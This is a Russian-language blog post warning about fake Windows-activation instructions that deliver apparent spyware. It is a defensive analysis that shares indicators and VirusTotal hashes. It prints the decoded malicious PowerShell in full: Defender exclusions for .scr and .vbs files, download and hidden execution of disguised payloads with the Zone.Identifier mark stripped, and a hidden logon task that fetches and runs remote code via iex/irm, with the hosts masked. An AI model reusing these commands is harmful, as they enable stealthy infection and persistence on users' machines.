It's a new day — there's a new threat

It's a new day — there's a new threat

На этот раз всё гораздо сложнее (по крайней мере, для меня).
За несколько минут убедиться, что здесь что-то нечисто не получилось.
Тем не менее, я уверен, что это — новая угроза.

Зачем так обфусцировать скрипт и URI серверов если, например, тот же MAS даёт открытый код.
Так что, base64 — тревожный звоночек.
Осторожность и здравый смысл должны удержать от запуска подобного.
Описывать всё пошагово очень долго, да и не всё я понимаю на 100%.

Снова используется PowerShell от имени Администратора.
Задействованы как минимум: base64, функция XOR, iex, irm.

Первый сценарий, который нас просят выполнить: через зашифрованную в base64 строку с удалённого сервера запрашивается скрипт, в котором содержится новая директива, часть которой зашифрована с помощью функции XOR; хорошая новость — ключ объявлен в первой же переменной. После последовательной дешифровки, на этот раз мы получаем требование добавить в исключения Защитника Windows файлы с расширениями .scr (файлы скринсейверов) и .vbs (файлы сценариев Visual Basic):

$extensions = @("scr", "vbs"); $extensions | ForEach-Object { Add-MpPreference -ExclusionExtension $_ 2>$null }

Второй сценарий: как и в прошлом случае (из моего предыдущего поста) с удалённого сервера запрашивается исполняемый файл под видом файла изображения .jpeg.
Удаляется признак файла Zone.Identifier, создаются скрытые окна, отложенное на 1 минуту после логина в систему запланированное задание с наивысшим приоритетом, возможно в трее появляется значок «Очистка диска» (накопитель со щёткой сверху), загружается ещё одна шифрованная директива:

$flnm="$env:TEMP\a1b2c3d4e5.scr"; Invoke-WebRequest -Uri "https://?.???.??/2024/10/19/1729318270-7484.jpeg" -OutFile $flnm -ErrorAction Stop; if (Get-Item -Path $flnm -Stream "Zone.Identifier" -ErrorAction SilentlyContinue) { Remove-Item -Path "$flnm:Zone.Identifier" -ErrorAction SilentlyContinue }; Start-Process -FilePath $flnm -Wait -WindowStyle Hidden; Remove-Item -Path $flnm -ErrorAction SilentlyContinue; Write-Output "Error: 0x0000231. Please check the system requirements or contact support for further assistance.."; $action=New-ScheduledTaskAction -Execute 'powershell.exe' -Argument '-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iex (irm ''??.???.???.???/0x55/3'')"'; $trigger=New-ScheduledTaskTrigger -AtLogon; $trigger.Delay="PT1M"; Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "SecurityHealthSystray" -RunLevel Highest -Force | Out-Null

В ней содержится URI ещё одного файла «изображения» для загрузки; на этот раз — файл сценария .vbs, заботливо добавленный в исключения на первом шаге и скрипт пытается выполниться:

$flnm="$env:TEMP\a1b2c3d4e5.scr"; Invoke-WebRequest -Uri "https://?.???.??/2024/10/20/1729436056-7218.jpeg" -OutFile $flnm -ErrorAction Stop; if (Get-Item -Path $flnm -Stream "Zone.Identifier" -ErrorAction SilentlyContinue) { Remove-Item -Path "$flnm:Zone.Identifier" -ErrorAction SilentlyContinue }; $wsh=New-Object -ComObject WScript.Shell; $wsh.Run($flnm, 0, $true); Remove-Item -Path $flnm -ErrorAction SilentlyContinue

Он слишком огромен для файла сценариев, но половина объёма составляет иконка. Файл сценариев, скорее всего, просто извлекается при выполнении.

Первый файл был загружен на VirusTotal сутки назад, скриншоты:

It's a new day — there's a new threat
It's a new day — there's a new threat

Второй до меня не загружал никто, скриншоты:

It's a new day — there's a new threat
It's a new day — there's a new threat

Отчёты о проверке на VirusTotal:

Первый файл:
Размер: 269312 байт
SHA-256: da5152c1d2ef8cbad1a26ae529ddf2c5eaacff627d30997d04e5456e696616dc

Второй файл:
Размер: 561152 байта
SHA-256: 82f41cd46f9659a7f1ad4379866a20a17e19faf167ea7b7777730b17e42e05ee

В этот раз угрозу увидел даже Kaspersky; снова это какое-то spyware; возможно, стилер.

Наверное, скоро эти «инструкции» появятся на крупных площадках в Рунете, а может и не только у нас.
К сожалению, у меня практически нигде нет аккаунтов чтобы я мог отправить репорт или пожаловаться.

Они уже есть на:

github (на русском)

github (на английском)

Последовательность попытки заражения содержит обращение к API ip.sb, возможно с целью определения страны жертвы.

Возможно, вирус нацелен на русскоязычных пользователей и продолжает сценарий заражения целевой системы если получен подходящий IP.

Возможно, сценарий останавливается в какой-то момент с сообщением: «Error: 0x0000231. Please check the system requirements or contact support for further assistance..»

Возможно, это сообщение об ошибке просто заглушка, поясняющая что произошёл «сбой» попытки активации.

Хотя, «приятным» бонусом к заражению могла бы идти активация неактивированной ОС с какого-нибудь KMS-сервера. Бдительность усыпило бы хорошо так.

Надеюсь, я сам не запутался в попытках коротко описать это всё. Я могу.

Опять же, я просто попытался описать сценарий доставки payload до компьютера жертвы.
Для чего предназначена сама полезная нагрузка я не знаю.
К тому же, до кода ещё нужно добраться.
Может быть применён хитрый упаковщик .exe-файлов.
Может быть код сильно обфусцирован.
На данный момент я не потяну.
Да может, это не так уж и важно.

Может, я преувеличиваю опасность или вовсе ошибаюсь, не являясь специалистом в ИБ, но всё-таки решил поделиться изысканиями.

И чтобы снова дёрнуть Рейнджера. =)

22